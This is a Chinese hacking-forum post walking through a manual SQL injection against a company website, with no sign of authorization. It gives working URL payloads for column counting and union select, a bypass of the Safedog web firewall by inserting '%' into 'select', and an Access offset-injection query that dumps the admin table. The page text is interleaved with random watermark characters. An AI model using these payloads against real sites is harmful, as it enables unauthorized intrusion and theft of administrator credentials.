找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2101|回复: 0
打印 上一主题 下一主题

一次手工渗透突破安全狗防御+ACCESS偏移注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:49:45 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
打开网站,一个企业站。
2 w; i1 D9 C* }* S4 V. X- j; ]' S- y4 ]

6 i. I7 [2 R& x( f# Q. {) _; c顺手加个admin  \2 D# C3 C+ c2 J

1 h& h" k2 J9 L2 N: w2 D$ X  D1 V9 k! U" ]6 v6 `! A% q
默认后台。. f& T! D2 f6 b  f" Q7 p
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。​) z  T# E+ [" b6 _% K+ u0 s
+ d% a1 p* x+ Y

( @% Q9 s  \. i
1 i, v: o: q" n( J% x所以就不用御剑扫了,待会直接封IP。
- i) T6 [0 P- p. `+ b3 {# m ! \" t- m' g0 x0 W# c; }, p+ \
用order by语句判断是否存在注入。
( A4 T/ ?6 C1 W  `; h( c# S( Nhttp://www.xxx.com /product_show.asp?id=997 order by 1; l" g- ~8 y1 ^, S/ @- W
http://www.xxx.com /product_show.asp?id=997 order by 100
7 r/ K; {8 A7 ^  c1 H3 w现在存在注入,经测试后发现是9个字段。
  p! y# f. V& Z2 p0 f  m
* A5 U% p; B, Z1 _7 K. X接下来进行联合查询,猜是否存在admin表。" D  F3 A- T& p1 n# G
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。​6 j; }8 d+ L0 U: k
* @6 d" g  l0 d! s  Z
1 ]' J, K3 H5 e8 j9 G

* ]. c7 O' V- b; R& m0 j' ~' P  _在select中间加个%,se%lect绕过安全狗。+ g& ?9 p6 z8 ^$ j' M) N
7 t, ~4 p% Q8 [1 _9 `* D

: E! L/ N  T2 L  s3 V发现存在admin表,然后开始手工猜常用的字段。
; n- `; ^' Y7 D纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。2 _6 ^# X2 e& @( E. h) f0 q

0 v/ I& d; U: J( u8 R0 T# T/ Z/ i! w突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。4 w4 x6 ^- r* F( e+ f! [

/ a; T& T) ]) N科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。5 |! B* @  Q0 Z! f/ R
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin! N8 R: p  {8 c# T0 i$ T
好了,敏感内容出显了。​( I6 K% U- z0 G# q

; M5 O3 v( L- ]. N
& _  E* v/ e3 |
# P3 V1 q6 i8 o" `# |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表